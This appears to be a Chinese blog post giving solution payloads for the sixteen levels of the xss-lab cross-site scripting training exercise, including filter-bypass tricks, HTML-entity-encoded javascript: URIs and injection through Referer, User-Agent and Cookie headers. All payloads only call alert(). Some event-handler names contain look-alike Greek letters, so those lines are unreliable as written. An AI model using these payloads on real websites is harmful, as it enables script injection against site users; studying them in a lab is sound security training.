xss注入实验(xss-lab)

  • xss-lab
  1. 第一关

代码:<Script>alert(1)</Script>

  1. 第二关

代码:1"><ScRipt>alert(1)</ScRipt>

  1. 第三关

代码:' onclick ='javascript:alert(1)'//

  1. 第四关

代码:" onclick ="javascript:alert(1)"//

  1. 第五关

代码:"></input><a href='javascript:alert(1)'>www</a>//

  1. 第六关

代码:1"><ScRipt>alert(1)</ScRipt>

  1. 第七关

代码:1"><ScscriptRipt>alert(1)</ScscriptRipt>

  1. 第八关

代码:

复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
  1. 第九关

代码:

复制代码
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x31;&#x27;&#x29; //http://www.baidu.com
  1. 第十关

代码:&t_sort=" type='text' οnclick='javascript:alert(1)'>//

  1. 第十一关

代码:添加referer字段:'" type='text' οnblur='javascript:alert("aini")'

  1. 第十二关

代码:更改user-agents字段:user-agent:'" type='text' οnclick='alert(123)'

  1. 第十三关

代码:Cookie: '" type='text' οnclick='alert(123)'

  1. 第十四关

代码:直接更改url,重定向到15关

  1. 第十五关

代码:?src='level1.php?name=<p οnmοusedοwn=alert()>哈哈哈</p>'

  1. 第十六关

代码:keyword=<img%0Dsrc=1%0Dοnerrοr=alert(1)>

相关推荐
灵机一物2 分钟前
灵机一物AI原生电商小程序、PC端(已上线)-TST Token叠加训练技术解析:预训练提速2.5倍,零改架构、零推理负担
人工智能
ZC跨境爬虫4 分钟前
跟着 MDN 学 HTML day_57:(HTML 表格进阶特性与无障碍实践)
java·前端·javascript·ui·html·音视频
Moment5 分钟前
刷 Reddit 1 小时没结果?我用这个方法 10 秒挖出真实需求
前端·javascript·后端
孙高飞6 分钟前
AI 驱动 UI 自动化的完整 DEOM 工程下载与详解
人工智能·ui·自动化
折翅嘀皇虫6 分钟前
【无标题】steal_work_thread_pool
服务器·前端·算法
zzzsde6 分钟前
【Linux】线程概念与控制(3):线程ID&&C++封装线程
linux·运维·服务器·开发语言·算法
w_t_y_y8 分钟前
VUE组件配置项(零)概述
前端·javascript·vue.js
水云桐程序员9 分钟前
Web应用的分类
前端·javascript·vue.js·react.js·webkit
Jack N9 分钟前
2026 Web 网站性能优化指南
前端·性能优化
狒狒热知识9 分钟前
2026软文营销行业规范化发展报告:优质平台甄选标准与企业投放策略
人工智能